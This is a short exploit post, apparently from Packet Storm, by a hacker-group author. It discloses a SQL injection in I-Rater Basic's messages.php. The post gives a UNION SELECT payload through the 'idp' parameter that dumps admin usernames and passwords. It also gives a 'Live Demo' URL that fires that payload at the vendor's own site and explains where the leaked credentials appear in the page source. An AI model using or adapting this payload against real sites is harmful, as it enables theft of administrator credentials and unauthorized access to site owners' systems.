I-Rater Basic suffers from a remote SQL injection vulnerability in messages.php.
f44d02801233ab4da9be2c297e974ff8733001a42f220d261f2134ba08f7f66b#######################################################
I-Rater Basic(messages.php) SQL-injection.
#######################################################
###################################################
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[!] Script Name: I-Rater Basic
#[!] Home Page: http://www.i-rater.com
#[!] Google_Dork: N/A
###################################################
#[~] Example:
http://localhost/Path/messages.php?idp=[exploit]
#[~]Exploit:
-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin--
#[!] Live Demo
http://www.i-rater.com/basic/messages.php?idp=-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin--
#[!] Note
To see the information go View Sources/Search "large.php?id=" ;).
##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed